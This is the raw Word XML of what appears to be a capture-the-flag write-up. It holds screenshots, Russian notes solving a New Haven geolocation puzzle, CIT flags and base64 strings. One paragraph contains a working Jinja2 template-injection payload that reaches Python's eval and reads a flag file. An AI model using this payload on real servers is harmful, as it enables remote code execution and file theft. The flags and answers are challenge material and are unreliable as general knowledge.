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07A328">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="5679440"/>
            <wp:effectExtent l="0" t="0" r="2540" b="165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7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BB5D7"/>
    <w:p w14:paraId="7CA7CDF9">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>CIT{State_Street_New_Haven_CT}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3B7AF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Подсказка к головоломке: «Этот конкретный город в Коннектикуте известен своим стилем пиццы» → всё ещё Нью-Хейвен (столица пиццы в стиле Нью-Хейвен – с тонкой корочкой, особенно с белыми пиццами с моллюсками).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2FCE1B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E335461">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Подсказка «981»: Головоломка начинается с «981 элементарный». Адрес 981 State St (Provisions on State) находится на улице State Street. Это тонкая подсказка, указывающая на правильную улицу (рядом, по адресу 874 State Street, расположена Modern Apizza – одна из легендарных «большой тройки» пиццерий Нью-Хейвена).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F23BB9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="056BDFE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Чайки + пицца: Нью-Хейвен расположен на берегу пролива Лонг-Айленд, поэтому чаек здесь много. Они летают стаями, издавая громкие, назойливые сирены, и поедают крошки пиццы, разбросанные повсюду → запах пиццы въедается в их перья. Ощущение «за мной наблюдают повсюду» также подходит, потому что State Street – это оживлённый центр города с множеством туристов и уличных кафе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF27ED9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E75ECB6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Стейт-стрит — вторая по значимости улица, где продают пиццу (после Вустера), она менее "туристически ориентирована", поэтому многие местные жители упоминают её, когда говорят о "настоящей" пицце.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B21C543">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="594859F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1035E6EA">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="4599940"/>
            <wp:effectExtent l="0" t="0" r="8890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59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440EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5815E3B7">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="3263900"/>
            <wp:effectExtent l="0" t="0" r="5080" b="127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26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1FD28">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="4723765"/>
            <wp:effectExtent l="0" t="0" r="4445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72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80426"/>
    <w:p w14:paraId="77422690">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DB4B16F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="204344B0">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="4042410"/>
            <wp:effectExtent l="0" t="0" r="4445" b="152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04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2CBD7"/>
    <w:p w14:paraId="6B5D32E8">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3648075" cy="25717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6E609"/>
    <w:p w14:paraId="6D17AF2B">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="2138680"/>
            <wp:effectExtent l="0" t="0" r="7620" b="139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13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8A119">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5133975" cy="397192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397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97F8B">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76AAFB60">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="3791585"/>
            <wp:effectExtent l="0" t="0" r="5080" b="184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79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C70B3">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2253615" cy="1943735"/>
            <wp:effectExtent l="0" t="0" r="13335" b="184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53615" cy="194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243455" cy="2093595"/>
            <wp:effectExtent l="0" t="0" r="4445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43455" cy="209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591D1">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2839085" cy="2371090"/>
            <wp:effectExtent l="0" t="0" r="18415" b="1016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39085" cy="237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27296"/>
    <w:p w14:paraId="653EDAC5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>{{ ''|attr('_'*2 + 'class' + '_'*2)|attr('_'*2 + 'mro' + '_'*2)|last|attr('_'*2 + 'subclasses' + '_'*2)()|selectattr('_'*2 + 'name' + '_'*2, 'equalto', 'catch_warnings')|first|attr('_'*2 + 'init' + '_'*2)|attr('_'*2 + 'globals' + '_'*2)|attr('get')('_'*2 + 'builtins' + '_'*2)|attr('get')('eval')('open("/tmp/flag.txt").read()') }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B07C22">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4416928D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>CIT{55T1_R3m0t3_C0d3_3x3cut1on}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7899E7AB">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05787E80">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1519B32D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="4853940"/>
            <wp:effectExtent l="0" t="0" r="6985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85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C50B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E9CA548">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>CIT{iloveharrypottersomuchthaticouldreadallthebooksintwodaysmostlikely}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0B2772">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66381EE7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Vm0wd2QyUXlVWGxWV0d4V1YwZDRWMVl3WkRSWFJteFZVMjA1VjAxV2JETlhhMk0x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6D057D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>VmpGYWMySkVUbGhoTVVwVVZtcEdTMk15U2tWVWJHaG9UVlZ3VlZadGNFSmxSbGw1VTJ0V1ZXSkhhRzlVVmxaM1ZsWmFkR05GZEZSTlZUVkpWbTEw</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D077E69">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="264EBA3E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="315F643E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67F0AB57">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="4797425"/>
            <wp:effectExtent l="0" t="0" r="4445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79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606B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>CIT{S8kMc789Gd37Py1gQPiWbeqxx}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E5418C">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="541E308F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FCA9AEF">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2790825" cy="4924425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492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EA6CA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66055EA7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default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F97A98"/>
    <w:rsid w:val="0AB72099"/>
    <w:rsid w:val="24F97A98"/>
    <w:rsid w:val="436666DE"/>
    <w:rsid w:val="74466860"/>
    <w:rsid w:val="786D773D"/>
    <w:rsid w:val="7FD20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201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2026-04-17T16:22:00Z</dcterms:created>
  <dc:creator>Lenovo</dc:creator>
  <cp:lastModifiedBy>Lenovo</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-17T22:59:15Z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E8B6E59B384940579C7BA2CBD77701D0_11</vt:lpwstr>
  </property>
</Properties>
</file>